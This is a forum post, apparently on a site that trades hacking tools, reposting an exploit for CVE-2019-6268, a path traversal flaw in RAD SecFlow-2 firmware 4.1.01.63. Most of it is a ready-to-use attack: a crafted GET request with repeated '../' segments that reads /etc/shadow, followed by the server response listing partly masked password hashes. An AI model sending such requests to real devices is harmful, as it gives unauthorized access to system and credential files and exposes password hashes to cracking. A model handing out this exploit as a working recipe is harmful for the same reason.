Path traversal

  • 💌Important Message to All Fellas💌

    💌Important Message to All Fellas : 💌

    ⚠️Thank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    ⛔ Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    🏆 Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    ☣️ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    🎯 Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    ❤️ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. ❤️

marsha677

Member
Mar 14, 2024
Threads
17
79
18
Credits
632
# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63
# CVE: CVE-2019-6268

RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.

Steps to reproduce:

Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1

Response:
HTTP/1.1 200 OK

root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal

Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).
 

Forum statistics

Threads
1,775
Messages
35,463
Members
8,202
Latest member
Stole7161
Member time online
652d 10h 48m
Reputation(s)
26